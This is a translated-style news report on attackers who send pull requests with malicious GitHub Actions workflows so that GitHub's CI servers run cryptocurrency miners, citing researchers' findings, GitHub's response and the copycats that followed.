Dutch cyber security specialist Justin Perdok discovered that at least one hacker is abusing the CI / CD function of GitHub Actions to force the company’s servers to mine cryptocurrency. It seems that such attacks do not harm user projects in any way, but they create a huge load on the GitHub infrastructure.
– Justin Perdok (@JustinPerdok) April 2, 2021
Interestingly, Perdock was not the first to notice such attacks, he only drew attention to the problem: the first of them discovered a French researcher known as Tib, who wrote that the attacks began back in November 2020 and continue to this day.
Perdock says that everything is based on creating a fork of the legitimate repository, adding malicious GitHub Actions to the source code, and then sending a Pull Request to merge the code back with the original.
At the same time, the hacker does not rely on luck, that is, the owner of the original project does not have to approve this malicious Pull Request at all. Perdock says that the very fact of sending a Pull Request is enough for an attack. So, according to the specialist, attackers specifically target repository owners who use workflow automation, that is, check incoming Pull Requests using automated tasks.
As a result, after sending a malicious request, the GitHub systems process the attacker’s code and launch a virtual machine that downloads and launches cryptocurrency mining software in the GitHub infrastructure. Experts say that the miner disguises itself as npm.exe and communicates with the turtlecoin.herominers.com pool.
Perdock writes that he himself became a victim of cybercriminals and watched as they used up to 100 miners in just one attack.
The expert believes that hackers act randomly and on a large scale. For example, he identified at least one account creating hundreds of Pull Requests with malicious code.
GitHub representatives have already reported to the media, what they know is going on and they are actively investigating these mining abuses. However, the company gave the same answer to the French engineer last year.
Apparently, while the company is fighting the hacker by blocking his accounts, the attacker simply registers new ones as soon as the old ones are discovered and banned.
Even worse, Bleeping Computer reports that after the publication of these attacks, copycats have appeared on the network, abusing the same methods and using the GitHub infrastructure for mining. For example, one of the copycats sent over 50 malicious requests to legitimate repositories. According to the publication, copycats use the open source XMRig miner and do not hesitate to download it directly from the official repository on GitHub.